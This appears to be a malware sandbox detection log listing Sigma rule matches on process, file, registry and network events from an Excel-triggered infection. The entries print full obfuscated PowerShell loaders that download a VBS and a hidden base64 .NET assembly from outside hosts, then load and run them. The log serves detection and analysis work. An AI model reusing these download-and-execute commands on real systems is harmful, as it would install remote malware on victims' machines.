      Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRQU2hvbUVbNF0rJHBTaG9NZVszMF0rJ1gnKSgoJ2UzJysnSWltYWcnKydlVXJsID0gSGV1aHR0cHM6Ly8zMTA1LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1zaFRQSGJDUFg4by1sT3RDcUhMRzZfJysnMHhDeS14bDR0bnhsQVZiUTk1LWR2aVRLJysnNWNBUmFOZFFqYmIzbWV4ZndRekttVFhnJnNraXByZWc9dHJ1ZSZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI1MzEzMDliNWZmN2MgSGV1O2UzSXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ZTNJaW1hJysnZ2VCeXRlJysncyA9IGUzSXdlYkNsaWVudC5Eb3dubG9hZERhdGEoZTNJaW1hZ2VVcmwpO2UzSWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZycrJ106OlVURjguR2V0U3RyaW5nKGUzSWltYWdlQnl0ZXMnKycpO2UzSXN0YScrJ3J0RmxhZycrJyA9IEhldTw8QkFTRTY0X1NUQVJUPj5IZXU7ZTNJZW5kRmxhZyA9JysnIEgnKydldTw8QkFTRTY0X0VORD4+SGV1O2UzSXN0YXJ0SW5kZXggPSBlM0lpbWFnZVRleHQuSW5kZXhPZihlM0lzdGFydEZsYWcpO2UzSWVuZEluZGV4ID0gZTNJaW1hZ2VUZXh0LkluZGV4T2YoZTNJZW5kRmxhZyk7ZTNJc3RhcnRJbicrJ2RleCAtZ2UgMCAtYW5kIGUzSWVuZEluZGV4IC0nKydndCBlM0lzdGFydEluZGV4O2UzSScrJ3N0YXJ0SW5kZXggKz0gZTNJc3RhcnQnKydGbGFnLkxlJysnbmd0aDtlM0liYXNlNjRMZW5ndGggPSBlM0llbmRJbmRleCAtIGUzSXN0YXJ0SW5kZXg7ZTMnKydJYmFzZTY0Q29tbWFuZCA9IGUzSWltYWdlVGV4dCcrJy5TdWJzdHJpbmcoZTNJc3RhcnRJbmRleCwgZTNJYmFzZTY0TGVuZ3RoKTtlM0liYXNlNjRSZScrJ3YnKydlJysncnNlZCA9IC1qb2luIChlM0liYXNlNjRDb21tYW5kLlRvQ2gnKydhckFycmF5KCkga1VpIEZvckVhY2gtT2JqZWN0IHsgZTNJXyB9KVstMS4uLShlM0liYXNlNjRDb21tYW5kLkxlbmd0aCldO2UzSScrJ2NvbScrJ21hbmRCeXRlcyA9IFtTeXN0ZW0uJysnQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoZScrJzNJYmEnKydzZTY0UmV2ZXJzZWQpO2UzJysnSWxvYWRlJysnZEFzc2VtYmx5ID0gW1N5c3RlJysnbS5SJysnZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChlMycrJ0ljb21tYW5kQnl0ZXMpO2UzSXZhaU1ldGhvZCAnKyc9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoSGV1VkFJSGV1KTtlM0l2YWlNZXRob2QuSW52b2tlKGUzSW51bGwsIEAoSGV1dHh0JysnLk1STUFDLzEyMzEvNTcxLjQ0LjI3MS43MDEvLzpwdHRoSGV1LCBIZXVkZXNhdGl2YWRvSGV1LCBIZXVkZXNhdCcrJ2l2YWRvSGV1LCAnKydIZXVkZXNhdGl2YWRvSGV1LCBIZXVDYXNQb2xIZXUsIEhldWRlc2F0aXZhZG9IZXUsIEhldWRlc2F0aXZhZG9IZXUsSGUnKyd1ZGVzYXRpdmFkbycrJ0hldSxIZXVkZXNhdGl2YWRvSGV1LEhldWRlc2F0aXZhZG9IZXUsSGV1ZGVzYXRpdmFkb0hldSxIZXVkZXNhdGl2YWRvSGV1LEhldTFIZXUsSGV1ZCcrJ2VzYXRpdmFkb0gnKydldSkpOycpLnJFUGxhQ0UoKFtjSEFSXTcyK1tjSEFSXTEwMStbY0hBUl0xMTcpLFtTVFJJTkddW2NIQVJdMzkpLnJFUGxhQ0UoKFtjSEFSXTEwNytbY0hBUl04NStbY0hBUl0xMDUpLFtTVFJJTkddW2NIQVJdMTI0KS5yRVBsYUNFKCdlM0knLCckJykgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRQU2hvbUVbNF0rJHBTaG9NZVszMF0rJ1gnKSgoJ2UzJysnSWltYWcnKydlVXJsID0gSGV1aHR0cHM6Ly8zMTA1LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1zaFRQSGJDUFg4by1sT3RDcUhMRzZfJysnMHhDeS14bDR0bnhsQVZiUTk1LWR2aVRLJysnNWNBUmFOZFFqYmIzbWV4ZndRekttVFhnJnNraXByZWc9dHJ1ZSZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI1MzEzMDliNWZmN2MgSGV1O2UzSXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ZTNJaW1hJysnZ2VCeXRlJysncyA9IGUzSXdlYkNsaWVudC5Eb3du
      Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\cfogy1ty\cfogy1ty.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\cfogy1ty\cfogy1ty.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\SYStEM32\WinDoWspowERshElL\V1.0\POwersHell.ExE" "poWERsHeLL.eXe -ex bYPass -nOp -W 1 -C dEVICEcredENTIaLDepLoYMEnT.EXe ; iEX($(iEx('[SYsTEm.tExT.EncOdINg]'+[cHAr]0x3a+[CHar]58+'UtF8.gETSTRINg([SysTem.CONVERT]'+[CHar]58+[cHAr]58+'Frombase64sTriNG('+[CHAr]0x22+'JEpQemwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVtYkVyZEVmaU5pVGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICByVkZQY0wsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ09OZ0J5LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhhLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtaEJPLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZQT0VmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaXF3USIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRXNQYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeUZIU21reVdJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRKUHpsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzUvMTMyMS9zZWV0aGViZXN0dGhpbmdzZW50aXJldGltZXdoaWNoZ2l2ZW5iZXN0ZGVzaWduZm9yeW91cnRoaW5ncy50SUYiLCIkRU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aGljaGdpdmVuYmVzdGRlc2lnbmZvcnlvdXJ0aC52QnMiLDAsMCk7c1RBcnQtc2xlRXAoMyk7SUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHNlZXRoZWJlc3R0aGluZ3NlbnRpcmV0aW1ld2hpY2hnaXZlbmJlc3RkZXNpZ25mb3J5b3VydGgudkJzIg=='+[cHAr]0X22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3784, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\cfogy1ty\cfogy1ty.cmdline", ProcessId: 3988, ProcessName: csc.exe
      Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 152.231.102.107, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3344, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49163
      Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3784, TargetFilename: C:\Users\user\AppData\Roaming\seethebestthingsentiretimewhichgivenbestdesignforyourth.vBs
      Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49163, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3344, Protocol: tcp, SourceIp: 152.231.102.107, SourceIsIpv6: false, SourcePort: 443
      Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $PShomE[4]+$pShoMe[30]+'X')(('e3'+'Iimag'+'eUrl = Heuhttps://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_'+'0xCy-xl4tnxlAVbQ95-dviTK'+'5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c Heu;e3IwebClient = New-Object System.Net.WebClient;e3Iima'+'geByte'+'s = e3IwebClient.DownloadData(e3IimageUrl);e3IimageText = [System.Text.Encoding'+']::UTF8.GetString(e3IimageBytes'+');e3Ista'+'rtFlag'+' = Heu<<BASE64_START>>Heu;e3IendFlag ='+' H'+'eu<<BASE64_END>>Heu;e3IstartIndex = e3IimageText.IndexOf(e3IstartFlag);e3IendIndex = e3IimageText.IndexOf(e3IendFlag);e3IstartIn'+'dex -ge 0 -and e3IendIndex -'+'gt e3IstartIndex;e3I'+'startIndex += e3Istart'+'Flag.Le'+'ngth;e3Ibase64Length = e3IendIndex - e3IstartIndex;e3'+'Ibase64Command = e3IimageText'+'.Substring(e3IstartIndex, e3Ibase64Length);e3Ibase64Re'+'v'+'e'+'rsed = -join (e3Ibase64Command.ToCh'+'arArray() kUi ForEach-Object { e3I_ })[-1..-(e3Ibase64Command.Length)];e3I'+'com'+'mandBytes = [System.'+'Convert]::FromBase64String(e'+'3Iba'+'se64Reversed);e3'+'Iloade'+'dAssembly = [Syste'+'m.R'+'eflection.Assembly]::Load(e3'+'IcommandBytes);e3IvaiMethod '+'= [dnlib.IO.Home].GetMethod(HeuVAIHeu);e3IvaiMethod.Invoke(e3Inull, @(Heutxt'+'.MRMAC/1231/571.44.271.701//:ptthHeu, HeudesativadoHeu, Heudesat'+'ivadoHeu, '+'HeudesativadoHeu, HeuCasPolHeu, HeudesativadoHeu, HeudesativadoHeu,He'+'udesativado'+'Heu,HeudesativadoHeu,HeudesativadoHeu,HeudesativadoHeu,HeudesativadoHeu,Heu1Heu,Heud'+'esativadoH'+'eu));').rEPlaCE(([cHAR]72+[cHAR]101+[cHAR]117),[STRING][cHAR]39).rEPlaCE(([cHAR]107+[cHAR]85+[cHAR]105),[STRING][cHAR]124).rEPlaCE('e3I','$') )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $PShomE[4]+$pShoMe[30]+'X')(('e3'+'Iimag'+'eUrl = Heuhttps://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_'+'0xCy-xl4tnxlAVbQ95-dviTK'+'5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c Heu;e3IwebClient = New-Object System.Net.WebClient;e3Iima'+'geByte'+'s = e3IwebClient.DownloadData(e3IimageUrl);e3IimageText = [System.Text.Encoding'+']::UTF8.GetString(e3IimageBytes'+');e3Ista'+'rtFlag'+' = Heu<<BASE64_START>>Heu;e3IendFlag ='+' H'+'eu<<BASE64_END>>Heu;e3IstartIndex = e3IimageText.IndexOf(e3IstartFlag);e3IendIndex = e3IimageText.IndexOf(e3IendFlag);e3IstartIn'+'dex -ge 0 -and e3IendIndex -'+'gt e3IstartIndex;e3I'+'startIndex += e3Istart'+'Flag.Le'+'ngth;e3Ibase64Length = e3IendIndex - e3IstartIndex;e3'+'Ibase64Command = e3IimageText'+'.Substring(e3IstartIndex, e3Ibase64Length);e3Ibase64Re'+'v'+'e'+'rsed = -join (e3Ibase64Command.ToCh'+'arArray() kUi ForEach-Object { e3I_ })[-1..-(e3Ibase64Command.Length)];e3I'+'com'+'mandBytes = [System.'+'Convert]::FromBase64String(e'+'3Iba'+'se64Reversed);e3'+'Iloade'+'dAssem
      Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $PShomE[4]+$pShoMe[30]+'X')(('e3'+'Iimag'+'eUrl = Heuhttps://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_'+'0xCy-xl4tnxlAVbQ95-dviTK'+'5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c Heu;e3IwebClient = New-Object System.Net.WebClient;e3Iima'+'geByte'+'s = e3IwebClient.DownloadData(e3IimageUrl);e3IimageText = [System.Text.Encoding'+']::UTF8.GetString(e3IimageBytes'+');e3Ista'+'rtFlag'+' = Heu<<BASE64_START>>Heu;e3IendFlag ='+' H'+'eu<<BASE64_END>>Heu;e3IstartIndex = e3IimageText.IndexOf(e3IstartFlag);e3IendIndex = e3IimageText.IndexOf(e3IendFlag);e3IstartIn'+'dex -ge 0 -and e3IendIndex -'+'gt e3IstartIndex;e3I'+'startIndex += e3Istart'+'Flag.Le'+'ngth;e3Ibase64Length = e3IendIndex - e3IstartIndex;e3'+'Ibase64Command = e3IimageText'+'.Substring(e3IstartIndex, e3Ibase64Length);e3Ibase64Re'+'v'+'e'+'rsed = -join (e3Ibase64Command.ToCh'+'arArray() kUi ForEach-Object { e3I_ })[-1..-(e3Ibase64Command.Length)];e3I'+'com'+'mandBytes = [System.'+'Convert]::FromBase64String(e'+'3Iba'+'se64Reversed);e3'+'Iloade'+'dAssembly = [Syste'+'m.R'+'eflection.Assembly]::Load(e3'+'IcommandBytes);e3IvaiMethod '+'= [dnlib.IO.Home].GetMethod(HeuVAIHeu);e3IvaiMethod.Invoke(e3Inull, @(Heutxt'+'.MRMAC/1231/571.44.271.701//:ptthHeu, HeudesativadoHeu, Heudesat'+'ivadoHeu, '+'HeudesativadoHeu, HeuCasPolHeu, HeudesativadoHeu, HeudesativadoHeu,He'+'udesativado'+'Heu,HeudesativadoHeu,HeudesativadoHeu,HeudesativadoHeu,HeudesativadoHeu,Heu1Heu,Heud'+'esativadoH'+'eu));').rEPlaCE(([cHAR]72+[cHAR]101+[cHAR]117),[STRING][cHAR]39).rEPlaCE(([cHAR]107+[cHAR]85+[cHAR]105),[STRING][cHAR]124).rEPlaCE('e3I','$') )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $PShomE[4]+$pShoMe[30]+'X')(('e3'+'Iimag'+'eUrl = Heuhttps://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_'+'0xCy-xl4tnxlAVbQ95-dviTK'+'5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c Heu;e3IwebClient = New-Object System.Net.WebClient;e3Iima'+'geByte'+'s = e3IwebClient.DownloadData(e3IimageUrl);e3IimageText = [System.Text.Encoding'+']::UTF8.GetString(e3IimageBytes'+');e3Ista'+'rtFlag'+' = Heu<<BASE64_START>>Heu;e3IendFlag ='+' H'+'eu<<BASE64_END>>Heu;e3IstartIndex = e3IimageText.IndexOf(e3IstartFlag);e3IendIndex = e3IimageText.IndexOf(e3IendFlag);e3IstartIn'+'dex -ge 0 -and e3IendIndex -'+'gt e3IstartIndex;e3I'+'startIndex += e3Istart'+'Flag.Le'+'ngth;e3Ibase64Length = e3IendIndex - e3IstartIndex;e3'+'Ibase64Command = e3IimageText'+'.Substring(e3IstartIndex, e3Ibase64Length);e3Ibase64Re'+'v'+'e'+'rsed = -join (e3Ibase64Command.ToCh'+'arArray() kUi ForEach-Object { e3I_ })[-1..-(e3Ibase64Command.Length)];e3I'+'com'+'mandBytes = [System.'+'Convert]::FromBase64String(e'+'3Iba'+'se64Reversed);e3'+'Iloade'+'dAssem
      Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingsentiretimewhichgivenbestdesignforyourth.vBs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingsentiretimewhichgivenbestdesignforyourth.vBs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\SYStEM32\WinDoWspowERshElL\V1.0\POwersHell.ExE" "poWERsHeLL.eXe -ex bYPass -nOp -W 1 -C dEVICEcredENTIaLDepLoYMEnT.EXe ; iEX($(iEx('[SYsTEm.tExT.EncOdINg]'+[cHAr]0x3a+[CHar]58+'UtF8.gETSTRINg([SysTem.CONVERT]'+[CHar]58+[cHAr]58+'Frombase64sTriNG('+[CHAr]0x22+'JEpQemwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVtYkVyZEVmaU5pVGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICByVkZQY0wsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ09OZ0J5LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhhLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtaEJPLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZQT0VmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaXF3USIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRXNQYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeUZIU21reVdJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRKUHpsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzUvMTMyMS9zZWV0aGViZXN0dGhpbmdzZW50aXJldGltZXdoaWNoZ2l2ZW5iZXN0ZGVzaWduZm9yeW91cnRoaW5ncy50SUYiLCIkRU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aGljaGdpdmVuYmVzdGRlc2lnbmZvcnlvdXJ0aC52QnMiLDAsMCk7c1RBcnQtc2xlRXAoMyk7SUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHNlZXRoZWJlc3R0aGluZ3NlbnRpcmV0aW1ld2hpY2hnaXZlbmJlc3RkZXNpZ25mb3J5b3VydGgudkJzIg=='+[cHAr]0X22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3784, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingsentiretimewhichgivenbestdesignforyourth.vBs" , ProcessId: 1808, ProcessName: wscript.exe
      Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3784, TargetFilename: C:\Users\user\AppData\Local\Temp\cfogy1ty\cfogy1ty.cmdline
      Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3344, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\SYStEM32\WinDoWspowERshElL\V1.0\POwersHell.ExE" "poWERsHeLL.eXe -ex bYPass -nOp -W 1 -C dEVICEcredENTIaLDepLoYMEnT.EXe ; iEX($(iEx('[SYsTEm.tExT.EncOdINg]'+[cHAr]0x3a+[CHar]58+'UtF8.gETSTRINg([SysTem.CONVERT]'+[CHar]58+[cHAr]58+'Frombase64sTriNG('+[CHAr]0x22+'JEpQemwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVtYkVyZEVmaU5pVGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICByVkZQY0wsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ09OZ0J5LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhhLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtaEJPLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZQT0VmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaXF3USIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRXNQYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeUZIU21reVdJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRKUHpsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzUvMTMyMS9zZWV0aGViZXN0dGhpbmdzZW50aXJldGltZXdoaWNoZ2l2ZW5iZXN0ZGVzaWduZm9yeW91cnRoaW5ncy50SUYiLCIkRU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aGljaGdpdmVuYmVzdGRlc2lnbmZvcnlvdXJ0aC52QnMiLDAsMCk7c1RBcnQtc2xlRXAoMyk7SUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHNlZXRoZWJlc3R0aGluZ3NlbnRpcmV0aW1ld2hpY2hnaXZlbmJlc3RkZXNpZ25mb3J5b3VydGgudkJzIg=='+[cHAr]0X22+'))')))", CommandLine: "C:\Windows\SYStEM32\WinDoWspowERshElL\V1.0\POwersHell.ExE" "poWERsHeLL.eXe -ex bYPass -nOp -W 1 -C dEVICEcredENTIaLDepLoYMEnT.EXe ; iEX($(iEx('[SYsTEm.tExT.EncOdINg]'+[cHAr]0x3a+[CHar]58+'UtF8.gETSTRINg([SysTem.CONVERT]'+[CHar]58+[cHAr]58+'Frombase64sTriNG('+[CHAr]0x22+'JEpQemwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVtYkVyZEVmaU5pVGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICByVkZQY0wsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ09OZ0J5LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhhLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtaEJPLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZQT0VmK
      Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $PShomE[4]+$pShoMe[30]+'X')(('e3'+'Iimag'+'eUrl = Heuhttps://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_'+'0xCy-xl4tnxlAVbQ95-dviTK'+'5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c Heu;e3IwebClient = New-Object System.Net.WebClient;e3Iima'+'geByte'+'s = e3IwebClient.DownloadData(e3IimageUrl);e3IimageText = [System.Text.Encoding'+']::UTF8.GetString(e3IimageBytes'+');e3Ista'+'rtFlag'+' = Heu<<BASE64_START>>Heu;e3IendFlag ='+' H'+'eu<<BASE64_END>>Heu;e3IstartIndex = e3IimageText.IndexOf(e3IstartFlag);e3IendIndex = e3IimageText.IndexOf(e3IendFlag);e3IstartIn'+'dex -ge 0 -and e3IendIndex -'+'gt e3IstartIndex;e3I'+'startIndex += e3Istart'+'Flag.Le'+'ngth;e3Ibase64Length = e3IendIndex - e3IstartIndex;e3'+'Ibase64Command = e3IimageText'+'.Substring(e3IstartIndex, e3Ibase64Length);e3Ibase64Re'+'v'+'e'+'rsed = -join (e3Ibase64Command.ToCh'+'arArray() kUi ForEach-Object { e3I_ })[-1..-(e3Ibase64Command.Length)];e3I'+'com'+'mandBytes = [System.'+'Convert]::FromBase64String(e'+'3Iba'+'se64Reversed);e3'+'Iloade'+'dAssembly = [Syste'+'m.R'+'eflection.Assembly]::Load(e3'+'IcommandBytes);e3IvaiMethod '+'= 